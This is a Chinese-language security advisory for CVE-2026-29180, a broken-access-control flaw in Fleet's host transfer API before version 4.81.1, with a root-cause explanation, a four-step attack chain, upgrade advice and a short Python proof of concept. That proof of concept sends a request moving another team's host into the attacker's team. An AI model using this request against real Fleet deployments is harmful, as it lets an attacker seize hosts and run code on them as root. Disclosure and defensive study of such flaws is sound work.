CVE-2026-29180 CVSS 8.8 高危

CVE-2026-29180 Fleet主机转移API越权访问漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29180

漏洞类型

访问控制失效

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet是一款开源设备管理软件。在4.81.1版本之前，其主机转移API存在严重的访问控制失效漏洞。该漏洞允许具有团队维护者权限的攻击者，将其他任意团队的主机转移到自己控制的团队中，从而绕过了系统的团队隔离安全边界。一旦主机被转移，攻击者将获得对被盗主机的完全控制权，并能够以root权限执行任意脚本。官方已在4.81.1版本中修复了此问题。

技术细节

该漏洞的根本原因在于Fleet主机转移API的权限校验逻辑存在缺陷。在正常的业务逻辑中，团队维护者应当仅能操作隶属于自己团队的主机。然而，由于访问控制机制失效，API在处理主机转移请求时，未严格验证请求发起者是否对目标主机拥有合法的管理权或归属权。攻击者只需拥有任意一个团队的维护者权限，即可通过构造特定的HTTP请求，指定系统中其他任意团队的主机ID作为转移目标。系统后端错误地处理了该越权请求，将目标主机的归属权强制修改为攻击者所在的团队。利用此漏洞，攻击者可以批量窃取所有团队的主机资源，随后利用Fleet平台的远程管理功能，在受害主机上以root权限执行任意恶意脚本，导致整个设备管理环境被完全控制。

攻击链分析

STEP 1

1. 权限获取

攻击者注册或入侵获得Fleet系统中一个团队的团队维护者（Team Maintainer）权限。

STEP 2

2. 目标识别

攻击者浏览系统或枚举主机ID，识别属于其他团队的目标主机。

STEP 3

3. 漏洞利用

攻击者向主机转移API发送恶意请求，利用访问控制失效漏洞，将目标主机的归属权转移到自己控制的团队。

STEP 4

4. 完全控制

一旦主机转移成功，攻击者利用Fleet的管理功能，以root权限在受害主机上执行任意代码或脚本。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target vulnerable Fleet instance
target_url = "https://fleet.example.com/api/v1/fleet/hosts/{target_host_id}/transfer"

# Attacker's authentication token (Team Maintainer role)
headers = {
    "Authorization": "Bearer <ATTACKER_TOKEN>",
    "Content-Type": "application/json"
}

# Payload to transfer a host from another team to attacker's team
# The vulnerability allows transferring any host ID to the attacker's team
payload = {
    "team_id": "<ATTACKER_TEAM_ID>"
}

# Send the malicious request
response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Host transfer successful! Full control gained.")
else:
    print("[-] Failed to transfer host.")

影响范围

Fleet < 4.81.1

防御指南

临时缓解措施

建议立即将Fleet升级至4.81.1或更高版本。如果无法立即升级，应严格限制团队维护者权限，并加强对主机转移API的日志监控，及时发现并阻断异常的主机归属变更行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表